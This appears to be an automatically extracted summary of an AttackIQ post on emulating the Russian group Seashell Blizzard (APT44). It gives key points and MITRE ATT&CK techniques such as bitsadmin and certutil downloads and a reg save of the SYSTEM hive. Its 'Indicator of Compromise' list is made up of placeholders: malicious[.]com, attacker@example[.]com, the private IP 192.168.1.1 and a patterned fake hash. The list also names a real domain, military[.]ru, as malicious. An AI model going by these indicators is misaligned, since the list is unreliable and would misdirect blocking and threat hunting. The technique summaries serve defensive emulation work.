FOCUS MODE
EXTRACT IOC
Threat Research

Emulating the Sophisticated Russian Adversary Seashell Blizzard

AttackIQ
Emulating the Sophisticated Russian Adversary Seashell Blizzard
Seashell Blizzard, also known as APT44, is a highly sophisticated Russian adversary linked to military intelligence, targeting various critical sectors to conduct espionage through persistent access and custom tools. The AttackIQ assessment template helps organizations validate their security against this threat. Affected: energy, telecommunications, government, military, transportation, manufacturing, retail sectors.

Keypoints :

  • Seashell Blizzard is associated with Russian military intelligence Unit 74455 (GRU).
  • The group has been active since at least 2009, targeting organizations globally.
  • Focused sectors include energy, telecommunications, government, military, transportation, manufacturing, and retail.
  • Operations are characterized by persistent access, espionage activities, and the use of both custom-developed and publicly available tools.
  • Particularly targets Industrial Control Systems (ICS) and SCADA systems.
  • AttackIQ released a new assessment template for validating security controls against Seashell Blizzard’s tactics.
  • The BadPilot campaign utilizes spear-phishing and exploits vulnerabilities for initial network access.
  • Assessment template divides tactics and techniques for evaluating security defenses against the group.
  • Emphasizes the importance of ongoing validation and improvement of security postures.
  • AttackIQ provides AEV solutions and partners with MITRE for developing threat-informed defenses.

MITRE Techniques :

  • Create or Modify System Process: Windows Service (T1543.003): Leverages the sc command line tool to create a new service.
  • BITS Jobs (T1197): Uses bitsadmin to create a BITS job for downloading a remote payload.
  • System Network Configuration Discovery: Internet Connection Discovery (T1016.001): Executes certutil to download a file from a website.
  • OS Credential Dumping: Security Account Manager (T1003.002): Attempts to save a copy of the HKLMSYSTEM registry hive using the reg save command.
  • System Owner/User Discovery (T1033): Executes whoami command to retrieve details about the running user account.
  • System Information Discovery (T1082): Executes systeminfo command to gather system information.
  • System Network Configuration Discovery (T1016): Executes arp -a to retrieve ARP information.
  • Ingress Tool Transfer (T1105): Details scenarios for downloading known malicious samples to disk.

Indicator of Compromise :

  • [Domain] military[.]ru
  • [URL] http://malicious[.]com/path
  • [Email Address] attacker@example[.]com
  • [IPv4 Address] 192.168.1.1
  • [SHA-256] 3fa9b23456790abcdef1234567890abcdef1234567890123456789012345678

Full Story: https://www.attackiq.com/2025/04/02/emulating-seashell-blizzard/

Tags: WINDOWS, CREDENTIAL, EMAIL, CRITICAL INFRASTRUCTURE, PHISHING, TOOL, PAYLOAD, PERSISTENCE